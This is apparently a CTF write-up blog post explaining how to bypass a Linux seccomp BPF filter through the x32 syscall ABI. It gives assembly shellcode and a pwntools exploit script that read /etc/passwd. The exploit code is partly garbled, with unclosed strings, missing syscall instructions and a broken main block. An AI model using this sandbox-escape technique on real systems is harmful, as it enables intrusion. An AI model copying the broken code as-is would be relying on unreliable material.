Hello I am Arsalan. Offensive Security Engineer, I blog about Cyber security, CTF writeup, Programming, Blockchain and more about tech. born and raised in indonesia, currently living in indonesia

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Bypassing seccomp BPF filter

Seccomp is a computer security facility in the Linux kernel.


In this post, I will explain how to bypass seccomp by access the x32 syscall ABI. It will work even if the seccomp is checking the current architecture. I will use the Siskohl sandbox challenge from CSCCTF final 2021 and try to use a forbidden syscall. the binary doesn’t use libseccomp instead it uses bpf seccomp

Seccomp info file

to examine which syscall is not allowed you can use seccomp-tools here is the seccomp information from the binary

as you can see, we can’t use those syscalls and the filter checks the current architecture. so we can’t bypass it by switching to 32-bit mode. in this post, I will try to use the x32 syscall ABI and use open, read, and write syscall. for example, I will try to see a file content inside /etc/passwd

Bypass seccomp filter

we can use 0x40000000 to bypass the filter, in order to call a forbidden syscall you can adding the syscall number with 0x40000000, so our shellcode will look like:

; open(0x0000000000404000, 0, 0) 0x0000000000404000 = path of the file we want to read
mov rax, 0x40000002
mov rdi, 0x0000000000404000
mov rsi, 0
mov rdx, 0

; read(path, 0x0000000000404000, 0x100) 
mov rdi, rax
mov rax, 0x40000000
mov rsi, 0x0000000000404000
mov rdx, 0x100

; write(1, 0x0000000000404000, 0x100) 
mov rax, 0x40000001
mov rdi, 1
mov rsi, 0x0000000000404000
mov rdx, 0x100


#!/usr/bin/env python2
import sys
from pwn import *
context.update(arch="amd64", endian="little", os="linux", log_level="info",
               terminal=["tmux", "split-window", "-v", "-p 85"],)
LOCAL, REMOTE = False, False

def attach(r):
    if LOCAL:
        bkps = ["* 0x401449"]
        gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))

def exploit(r):
    # attach(r)
    rw = 0x0000000000404000

    # stage 1
    setsyscall = '''
    mov r13, rdx

    mov rdi, 0x0000000000404000
    mov rsi, 0x68732f6e69622f2f
    mov [rdi+0], rsi

    mov rax, 0x40000000
    mov rsi, r13
    add rsi, 0x4a
    mov rdi, 0
    mov rdx, 1000

    mov r14, r13
    add r14, 0x48
    mov r15,  0x050e
    add r15, 1
    mov [r14+0], r15
    sh = asm(setsyscall)
    print len(sh)

    # stage 2
    shellcode =  '''

    mov r12, 0x0000000000404000
    mov rcx, 0x7361702f6374652f
    mov rdx, 0x0000000000647773
    mov [r12+0], rcx
    mov [r12+8], rdx

    mov rax, 0x40000002
    mov rdi, 0x0000000000404000
    mov rsi, 0
    mov rdx, 0

    mov rdi, rax
    mov rax, 0x40000000
    mov rsi, 0x0000000000404000
    mov rdx, 0x100

    mov rax, 0x40000001
    mov rdi, 1
    mov rsi, 0x0000000000404000
    mov rdx, 0x100

if __name__ == "__main__":
    if len(sys.argv)==2 and sys.argv[1]=="remote":
        REMOTE = True
        r = remote("", 13377)
        LOCAL = True
        r = process([TARGET,])